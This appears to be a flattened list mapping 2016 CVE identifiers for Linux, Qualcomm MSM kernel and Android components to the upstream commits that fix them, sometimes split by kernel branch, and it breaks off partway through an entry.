-CVE-2016-10283 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=93863644b4547324309613361d70ad9dc91f8dfd - Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=d60a5839ba987e2c9d365fef950cae0c9ad11010 -CVE-2016-10285 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=67dfd3a65336e0b3f55ee83d6312321dc5f2a6f9 -CVE-2016-10286 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=5d30a3d0dc04916ddfb972bfc52f8e636642f999 -CVE-2016-10287 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=937bc9e644180e258c68662095861803f7ba4ded -CVE-2016-10288 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=db2cdc95204bc404f03613d5dd7002251fb33660 -CVE-2016-10289 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a604e6f3889ccc343857532b63dea27603381816 - Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=08a969c0e4c399df047c8055ac11a19e124500ed -CVE-2016-10290 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a5e46d8635a2e28463b365aacdeab6750abd0d49 -CVE-2016-10291 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=c2b026dcd498c93a789b6b84dbe9a73c4a9d8135 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a225074c0494ca8125ca0ac2f9ebc8a2bd3612de -CVE-2016-10293 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=2469d5374745a2228f774adbca6fb95a79b9047f -CVE-2016-10294 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9e9bc51ffb8a298f0be5befe346762cdb6e1d49c -CVE-2016-10295 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=f11ae3df500bc2a093ddffee6ea40da859de0fa9 -CVE-2016-10296 - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=a5e46d8635a2e28463b365aacdeab6750abd0d49 -CVE-2016-1583 -# Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e54ad7f1ee263ffa5a2de9c609d58dfa27b21cd9 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2f36db71009304b3f0b95afacd8eba1f9f046b87 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=29d6455178a09e1dc340380c582b13356227e8df -CVE-2016-2053 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0d62e9dd6da45bbf0f33a8617afc5fe774c8f45f -CVE-2016-2059 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9e8bdd63f7011dff5523ea435433834b3702398d -CVE-2016-2060 - Link - https://source.codeaurora.org/quic/la/platform/system/netd/commit/?id=e9925f5acb4401588e23ea8a27c3e318f71b5cf8 -CVE-2016-2061 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=79db14ca9f791a14be9376a0340ad3b9b9a4d603 -CVE-2016-2062 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/drivers/gpu/msm/adreno_perfcounter.c?id=27c95b64b2e4b5ff1288cbaa6e353dd803d71576 -CVE-2016-2063 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=ab3f46119ca10de87a11fe966b0723c48f27acd4 -CVE-2016-2064 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88 -CVE-2016-2065 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88 -CVE-2016-2066 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88 -CVE-2016-2066 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.18/commit/?id=775fca8289eff931f91ff6e8c36cf2034ba59e88 -CVE-2016-2067 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.18/commit/?id=410cfa95f0a1cf58819cbfbd896f9aa45b004ac0 
-CVE-2016-2068 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?h=APSS.FSM.3.0&id=01ee86da5a0cd788f134e360e2be517ef52b6b00 -CVE-2016-2184 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=836b34a935abc91e13e63053d0a83b24dfb5ea78 -CVE-2016-2185 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=950336ba3e4a1ffd2ca60d29f6ef386dd2c7351d -CVE-2016-2186 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9c6ba456711687b794dcf285856fc14e2c76074f -CVE-2016-2187 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=162f98dea487206d9ab79fc12ed64700667a894d -CVE-2016-2188 - Depends - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4ec0ef3a82125efc36173062a50624550a900ae0 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b7321e81fc369abe353cf094d4f0dc2fe11ab95f -CVE-2016-2384 - Link - ^4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=07d86ca93db7e5cdf4743564d98292042ec21af7 -CVE-2016-2411 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=43e6938f37be0386fff4117e8aefff9be49bfe8a -CVE-2016-2438 - Link - https://github.com/torvalds/linux/commit/b5a663aa426f4884c71cd8580adae73f33570f0d -CVE-2016-2441 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=6fb29c4773f632b7b6c31a8de56f55c32de3d350 -CVE-2016-2442 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=6fb29c4773f632b7b6c31a8de56f55c32de3d350 -CVE-2016-2443 - Link - https://android.googlesource.com/kernel/msm/+/d22e409d672101e837d95c944161f072f894e682 -CVE-2016-2465 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=09dc4abecb0da388aedb37a57889c1ce2b267807 - Link - 3.18 - 
https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=240f3bd82840fe6df7989339e465e9558f42fb85 -CVE-2016-2466 - Link - https://android.googlesource.com/kernel/msm.git/+/8292fe595c99ccbcb5e73debdba21d5f1ad91ef6 -CVE-2016-2467 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=38b6131d78cecec5d970230aeee3cef485103d82 -CVE-2016-2468 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b5eb67744215b3434a36b9251e28da3dc2a638a6 - Link - https://android.googlesource.com/kernel/msm.git/+/eb6cc9d4af6791d4d34075e3fa08f0c858087a8c -CVE-2016-2469 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=e7369163162e7773bc887f7a264d6aa46cfcc665 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=7eb824e8e1ebbdbfad896b090a9f048ca6e63c9e -CVE-2016-2469 - Link - https://android.googlesource.com/kernel/msm/+/4029268991f478b98b6d37106af8f1f635c0b595 -CVE-2016-2470 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=05ce237387c6e1d101bbb4b825e56757576748e6 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=4fd81f97c3eaf42d506aa4f2b496862222c0a89d -CVE-2016-2471 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=2c8961821b7691a95cbf5ecc6996e8229d6d5303 -CVE-2016-2472 - Link - prima - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=464c9c8a984c3a36f63b1625d7ab2a1c9eec9697 -CVE-2016-2473 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/CORE/HDD/src/wlan_hdd_wext.c?id=0273cba64b0436d481e09222a631a6acc274b96c -CVE-2016-2474 - Depends - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=d541aecce07c65fee3ad3a4d900016e4d22f2b3d - Link - qcacld-2.0 - 
https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=681c310490e49adc43065d1d11006c5a5dc43568 -CVE-2016-2475 - Link - https://android.googlesource.com/kernel/tegra/+/9f0aa0c3fede9abb0b5ccadeca95f848cc791fba -CVE-2016-2477 - Link - https://android.googlesource.com/platform/hardware/qcom/media/+/f22c2a0f0f9e030c240468d9d18b9297f001bcf0 -CVE-2016-2478 - Link - https://android.googlesource.com/platform/hardware/qcom/media/+/f22c2a0f0f9e030c240468d9d18b9297f001bcf0 -CVE-2016-2480 - Link - https://android.googlesource.com/platform/hardware/qcom/media/+/560ccdb509a7b86186fac0fce1b25bd9a3e6a6e8 -CVE-2016-2482 - Link - https://android.googlesource.com/platform/hardware/qcom/media/+/46e305be6e670a5a0041b0b4861122a0f1aabefa -CVE-2016-2488 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=91ea960b91250eca57d8fbdb8aafa11d80695d46 -CVE-2016-2498 - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=1d23dacdbd6b3a2b59b952f2fa3a578f9d15f60f -CVE-2016-2501 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=0ee6c6f748e840c266fe26ed3c89d6bd7e3c9d4e -CVE-2016-2502 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=0bc45d7712eabe315ce8299a49d16433c3801156 -CVE-2016-2503 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=0c46fc0f8fb7ffd26557b51b235d463a01ee75f5 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=9ae71bc3a542f68ea93c4eff01a41201ee6d9402 -CVE-2016-2504 - Link - 3.4-^3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=f7c8dfd7060867d71fc370527e2e2278ffc3ba5e - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=75adbb8cebfe17ace640e6bd89582c1d72196378 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=APSS.FSM.3.0&id=ec5feea777b07c0e1f9ce45b7f3179a3f6facf75 -CVE-2016-2544 - 
Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=3567eb6af614dac436c4b16a8d426f9faed639b3 -CVE-2016-2545 - Link - ^4.4 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ee8413b01045c74340aa13ad5bdf905de32be736 -CVE-2016-2546 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=af368027a49a751d6ff4ee9e3f9961f35bb4fede -CVE-2016-2547 - Link - ^4.4 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5a663aa426f4884c71cd8580adae73f33570f0d -CVE-2016-2549 - Link - ^4.4 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2ba1fe7a06d3624f9a7586d672b55f08f7c670f3 -CVE-2016-2847 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=759c01142a5d0f364a462346168a56de28a80f52 -CVE-2016-3070 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=af110cc4b24250faafd4f3b9879cf51e350d7799 -CVE-2016-3134 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=54d83fc74aa9ec72794373cb47432c5f7fb1a309 -CVE-2016-3135 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d157bd761585605b7882935ffb86286919f62ea1 -CVE-2016-3136 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4e9a0b05257f29cf4b75f3209243ed71614d062e -CVE-2016-3137 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c55aee1bf0e6b6feec8b2927b43f7a09a6d5f754 -CVE-2016-3138 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8835ba4a39cf53f705417b3b3a94eb067673f2c9 -CVE-2016-3140 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5a07975ad0a36708c6b0a5b9fea1ff811d0b0c1f -CVE-2016-3156 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fbd40ea0180a2d328c5adc61414dc8bab9335ce2 
-CVE-2016-3672 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8b8addf891de8a00e4d39fc32f93f7c5eb8feceb -CVE-2016-3689 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a0ad220c96692eda76b2e3fd7279f3dcd1d8a8ff -CVE-2016-3746 - Link - https://source.codeaurora.org/quic/la//platform/hardware/qcom/media/commit/?id=c2e66c4ee83b4264d691d8aaabb2e94744df1e25 -CVE-2016-3747 - Link - https://source.codeaurora.org/quic/la//platform/hardware/qcom/media/commit/?id=905826825e4459c0dfc9d6475e950d6be3a16fc7 -CVE-2016-3768 - Link - https://source.codeaurora.org/quic/la//kernel/msm/commit/?id=d75be03af111fb5a31eba82f665242e6d8b07008 - Link - https://github.com/android/kernel_msm/commit/84d8c81420aaa7c6cd6f57cb52daccf07b1f7a50 -CVE-2016-3775 - Link - 3.4 - https://github.com/android/kernel_msm/commit/dc18eac80caaa12ff7072df9fe857b921e8c26c7 - Link - 3.4 - https://review.lineageos.org/81123 - Link - 3.10 - https://github.com/android/kernel_msm/commit/8096090858689395a75bbf696ff8276c3c236b98 - Link - 3.18 - https://github.com/android/kernel_msm/commit/b1568c363c54fa3aa98b1cfa7c535115950bec0c -CVE-2016-3792 - Link - prima - https://us.codeaurora.org/cgit/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=28d4f0c1f712bffb4aa5b47f06e97d5a9fa06d29 -CVE-2016-3797 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=fdda9c0af64d6e5cdf006e2d8dd57e655821a962 -CVE-2016-3809 - Link - https://android.googlesource.com/kernel/msm/+/f2152040cb3c13fa846914df1ad44a8a7fd2e935 -CVE-2016-3813 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=3c0add95808fdada98ba0ab465c0b4ba49e71d26 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=de81d402f12a3492400644024e694748d3514951 -CVE-2016-3841 - Link - 
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=45f6fad84cc305103b28d73482b344d7f5b76f39 -CVE-2016-3842 - Link - 3.4 - https://github.com/aosp-mirror/kernel_msm/commit/15701ca335357e98a0eb98ef079fe45e3b830591 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/f5f0a2fe84b589793baa5713ea2aa16779e00d5e - Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/905de01dda0bc6663f8ce5c8f0f3831dae49bb36 -CVE-2016-3843 - Depends - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=e65cc8f9c46c6b8119826fbc22ffeb4e96e80e8a - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=149cf87192059fab0cb49ec5c691783c3565c215 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=8fe72ba71e08fbc2c5a5d4985557247904d76054 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=15c897f31ba18f67559d6b7f1a6afa855baa756c -CVE-2016-3850 - Link - https://source.codeaurora.org/quic/la//kernel/lk/commit/?id=9a59b04c8ed8b57537f2f3cbcb06645575f64ac1 -CVE-2016-3854 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?h=LA.AF.1.2.1_rb1.5&id=cc96def76dfd18fba88575065b29f2ae9191fafa -CVE-2016-3855 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ab3f46119ca10de87a11fe966b0723c48f27acd4 -CVE-2016-3857 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.10.107&id=d948109df11c8485e972b4cc0eb4820d4b754615 -CVE-2016-3858 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=cab2ba71f13f04aa73c8b8dadc3fc184205c9474 -CVE-2016-3859 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=fe297dc01f7ea95bb1bff25f6fc4257f0ef832ff - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=61b419297e13ed9a28e9b880548b2d96d4aa6c0d -CVE-2016-3860 - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/sound/soc/msm/qdsp6v2/audio_calibration.c?id=528976f54be246ec93a71ac53aa4faf3e3791c48 -CVE-2016-3865 - Link - https://github.com/android/kernel_msm/commit/a92e71c20f4e6b2aa94b7614fd494833ea76b8b9 - Link - https://github.com/android/kernel_msm/commit/92242610894d1dc26759e486af1d11f2eb78c922 -CVE-2016-3866 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=5180cefe0eeb6f3e6e0c4967652facd20f07c20c -CVE-2016-3867 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=816da3d19cfee937f5add485a112bb1cdfcb72c8 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=b518b33d4b7da7df5a0348a97ffb4f35be819937 -CVE-2016-3868 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=17014696ce3836c91215b6d6dd82f3befd6e7d4d -CVE-2016-3874 - Depends - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=50e8f265b3f7926aeb4e49c33f7301ace89faa77 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=a3974e61c960aadcc147c3c5704a67309171642d -CVE-2016-3892 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=dd40cc2bd210dd7a4dd649e8f79add2bbeda2bd5 -CVE-2016-3893 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=a7a6ddc91cce7ad5ad55c9709b24bfc80f5ac873 -CVE-2016-3894 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=de3e3e5930b1edfebec7870390443279ec5b65fe -CVE-2016-3901 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=5f69ccf3b011c1d14a1b1b00dbaacf74307c9132 -CVE-2016-3902 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=2fca425d781572393fbe51abe2e27a932d24a768 -CVE-2016-3903 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b8874573428e8ce024f57c6242d662fcca5e5d55 
-CVE-2016-3904 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=069683407ca9a820d05c914b57c587bcd3f16a3a -CVE-2016-3905 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=b5112838eb91b71eded4b5ee37338535784e0aef -CVE-2016-3906 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=b333d32745fec4fb1098ee1a03d4425f3c1b4c2e -CVE-2016-3907 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=744330f4e5d70dce71c4c9e03c5b6a8b59bb0cda - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=289ede9d6bfb46178326ae9ca86033bbd452f269 -CVE-2016-3931 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e80b88323f9ff0bb0e545f209eec08ec56fca816 -CVE-2016-3934 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=27fbeb6b025d5d46ccb0497cbed4c6e78ed1c5cc -CVE-2016-3935 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=5f69ccf3b011c1d14a1b1b00dbaacf74307c9132 -CVE-2016-3938 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=467c81f9736b1ebc8d4ba70f9221bba02425ca10 -CVE-2016-3939 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=e0bb18771d6ca71db2c2a61226827059be3fa424 -CVE-2016-3951 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4d06dd537f95683aba3651098ae288b7cbff8274 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1666984c8625b3db19a9abc298931d35ab7bc64b -CVE-2016-4470 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=38327424b40bcebe2de92d07312c89360ac9229a -CVE-2016-4482 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=681fef8380eb818c0b845fca5d2ab1dcbab114ee -CVE-2016-4486 - Link - 
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5f8e44741f9f216e33736ea4ec65ca9ac03036e6 -CVE-2016-4569 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cec8f96e49d9be372fdb0c3836dcf31ec71e457e -CVE-2016-4578 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e4ec8cc8039a7063e24204299b462bd1383184a5 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9a47e9cff994f37f7f0dbd9ae23740d0f64f9fe6 -CVE-2016-4794 - Link - 3.18+ - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=6710e594f71ccaad8101bc64321152af7cd9ea28 - Link - 3.18+ - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=4f996e234dad488e5d9ba0858bc1bae12eff82c3 -CVE-2016-4805 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1f461dcdd296eecedaffffc6bae2bfa90bd7eb89 -CVE-2016-4998 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bdf533de6968e9686df777dc178486f600c6e617 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91 -CVE-2016-5195 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=9691eac5593ff1e2f82391ad327f21d90322aec1 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=e45a502bdeae5a075257c4f061d1ff4ff0821354 -CVE-2016-5340 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=06e51489061e5473b4e2035c79dcf7c27a6f75a6 -CVE-2016-5342 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=579e796cb089324c55e0e689a180575ba81b23d9 -CVE-2016-5343 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=6927e2e0af4dcac357be86ba563c9ae12354bb08 -CVE-2016-5344 - Link - 
https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=64e15c36d6c1c57dc2d95a3f163bc830a469fc20 -CVE-2016-5345 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=67118716a2933f6f30a25ea7e3946569a8b191c6 -CVE-2016-5346 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=6298a474322fb2182f795a622b2faa64abfd8474 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=25a64e34bbec7b14887cbfe8266ccf6f27113bab -CVE-2016-5347 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=ed4d6f5d8451d99860950d0abf8ad583efed6d5c - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=f14390f13e62460fc6b05fc0acde0e825374fdb6 -CVE-2016-5349 - Depends - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=7c3bf6557c62d904b15507eb451fda8fd7ef750c - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=03853a58952834ac3e1e3007c9c680dd4c001a2f - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=e3d969000fb60ecb9bc01667fa89957f67763514 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=9bd398661cae758ffc557adc7de74ba32654e1f9 -CVE-2016-5696 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=75ff39ccc1bd5d3c455b6822ab09e533c551f758 -CVE-2016-5829 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/drivers/hid/usbhid/hiddev.c?h=LA.UM.5.5.r1-04000-8x96.0&id=af37375834fe1dd7a7a08c6042664ffc2a1a3beb -CVE-2016-5853 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=e879fc7eca7e3ba0ab9dcf24d2f717e49718a01e - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=49d27afe9a76273e0d5314cf9241d1d1c3561d13 - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=a8f3b894de319718aecfc2ce9c691514696805be -CVE-2016-5854 - Link - 
https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=28d23d4d7999f683b27b6e0c489635265b67a4c9 -CVE-2016-5855 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=a5edb54e93ba85719091fe2bc426d75fa7059834 -CVE-2016-5856 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=0c0622914ba53cdcb6e79e85f64bfdf7762c0368 -CVE-2016-5857 - Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=d9d2c405d46ca27b25ed55a8dbd02bd1e633e2d5 -CVE-2016-5858 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=3154eb1d263b9c3eab2c9fa8ebe498390bf5d711 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=afc5bea71bc8f251dad1104568383019f4923af6 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=3bfe5a89916f7d29492e9f6d941d108b688cb804 -CVE-2016-5859 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=302b5348ecbba8cf032a9ffaaa63222a2b285d89 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=97fdb441a9fb330a76245e473bc1a2155c809ebe -CVE-2016-5860 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=25ab82f5d7d8d8d3b4c8eaaa02944dd5a81be7c3 - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=9bcf048a7d1a8a0511feb39d6d3111044e6278ec - Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=9f91ae0d7203714fc39ae78e1f1c4fd71ed40498 -CVE-2016-5861 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=cf3c97b8b6165f13810e530068fbf94b07f1f77d -CVE-2016-5862 - Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=4199451e83729a3add781eeafaee32994ff65b04 -CVE-2016-5863 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=daf0acd54a6a80de227baef9a06285e4aa5f8c93 -CVE-2016-5864 - Link - 
